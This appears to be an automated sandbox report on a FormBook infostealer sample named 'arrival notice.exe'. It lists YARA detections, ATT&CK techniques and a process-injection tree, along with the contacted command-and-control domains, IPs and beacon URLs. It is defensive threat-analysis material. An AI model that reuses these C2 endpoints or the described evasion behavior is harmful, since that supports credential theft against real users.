          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\arrival notice.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match, File source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match, File source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          MITRE ATT&CK Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 221 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 11 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          Behavior Graph ID: 483574, Sample: arrival notice.exe, Startdate: 15/09/2021, Architecture: WINDOWS, Score: 100

          DNS/IP info: www.ifbrick.com, www.aboutacoffee.com
          Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures

          • arrival notice.exe 3 (started)
            Signatures: Injects a PE file into a foreign processes
            • arrival notice.exe (started)
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
              • explorer.exe (injected)
                DNS/IP info: www.beerenhunger.info 217.160.0.150, 49819, 80, ONEANDONE-ASBrauerstrasse48DE, Germany; ilovecoventry.com 184.168.131.241, 49814, 80, AS-26496-GO-DADDY-COM-LLCUS, United States; 5 other IPs or domains
                Signatures: System process connects to network (likely due to code injection or exploit)
                • colorcpl.exe (started)
                  Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                  • cmd.exe 1 (started)
                    • conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          3.2.arrival notice.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          ilovecoventry.com | 184.168.131.241 | true | true | | unknown
          www.beerenhunger.info | 217.160.0.150 | true | true | | unknown
          www.aboutacoffee.com | 104.21.85.192 | true | false | | unknown
          ext-sq.squarespace.com | 198.185.159.144 | true | false | | high
          www.ifbrick.com | 165.73.84.33 | true | false | | unknown
          www.singisa4letterword.com | unknown | unknown | true | | unknown
          www.ilovecoventry.com | unknown | unknown | true | | unknown
          www.petrosterzis.com | unknown | unknown | true | | unknown
          www.mybenefits51.com | unknown | unknown | true | | unknown

                            Contacted URLs

                            Name | Malicious | Antivirus Detection | Reputation
                            http://www.beerenhunger.info/n58i/?vbOlS=UboLn&jrU4NBtp=T43/QHtHCDAxgurMA2nnAzm7cVxOj31InS0qjlwJ5pTUrF8t/fgh9WgQ4TT9zfTSmLODbJhfnA== | true | Avira URL Cloud: safe | unknown
                            http://www.singisa4letterword.com/n58i/?jrU4NBtp=kluGknW3JYulth+FZOKNGJWFLrjrg7vx1WPWThgYE53lU0Uyu20JwynqYY4FZ9Ej1j1u7QgdhQ==&vbOlS=UboLn | true | Avira URL Cloud: safe | unknown
                            http://www.ilovecoventry.com/n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn | true | Avira URL Cloud: safe | unknown
                            www.nordicbatterybelt.net/n58i/ | true | Avira URL Cloud: safe | low

                            URLs from Memory and Binaries


                                                  Contacted IPs


                                                  Public

                                                  IP | Domain | Country | ASN | ASN Name | Malicious
                                                  198.185.159.144 | ext-sq.squarespace.com | United States | 53831 | SQUARESPACEUS | false
                                                  184.168.131.241 | ilovecoventry.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
                                                  217.160.0.150 | www.beerenhunger.info | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true

                                                  General Information

                                                  Joe Sandbox Version: 33.0.0 White Diamond
                                                  Analysis ID: 483574
                                                  Start date: 15.09.2021
                                                  Start time: 09:21:40
                                                  Joe Sandbox Product: CloudBasic
                                                  Overall analysis duration: 0h 11m 17s
                                                  Hypervisor based Inspection enabled: false
                                                  Report type: full
                                                  Sample file name: arrival notice.exe
                                                  Cookbook file name: default.jbs
                                                  Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed: 22
                                                  Number of new started drivers analysed: 0
                                                  Number of existing processes analysed: 0
                                                  Number of existing drivers analysed: 0
                                                  Number of injected processes analysed: 0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode: default
                                                  Analysis stop reason: Timeout
                                                  Detection: MAL
                                                  Classification: mal100.troj.evad.winEXE@7/1@7/3
                                                  EGA Information: Failed
                                                  HDC Information:
                                                  • Successful, ratio: 30.3% (good quality ratio 28.1%)
                                                  • Quality average: 74.5%
                                                  • Quality standard deviation: 30.4%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 73
                                                  • Number of non-executed functions: 125
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .exe
                                                  Warnings:
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                  • Excluded IPs from analysis (whitelisted): 92.122.145.220, 20.82.210.154, 8.238.85.126, 8.248.145.254, 8.248.137.254, 8.253.145.120, 8.248.141.254, 20.54.110.249, 40.112.88.60, 23.216.77.208, 23.216.77.209, 23.35.236.56, 20.50.102.62
                                                  • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                  • Not all processes were analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  Time | Type | Description
                                                  09:22:50 | API Interceptor | 1x Sleep call for process: arrival notice.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs


                                                  Domains


                                                  ASN


                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\arrival notice.exe.log
                                                  Process: C:\Users\user\Desktop\arrival notice.exe
                                                  File Type: ASCII text, with CRLF line terminators
                                                  Category: dropped
                                                  Size (bytes): 1216
                                                  Entropy (8bit): 5.355304211458859
                                                  Encrypted: false
                                                  SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                  MD5: FED34146BF2F2FA59DCF8702FCC8232E
                                                  SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                  SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                  SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                  Malicious: false
                                                  Reputation: high, very likely benign file
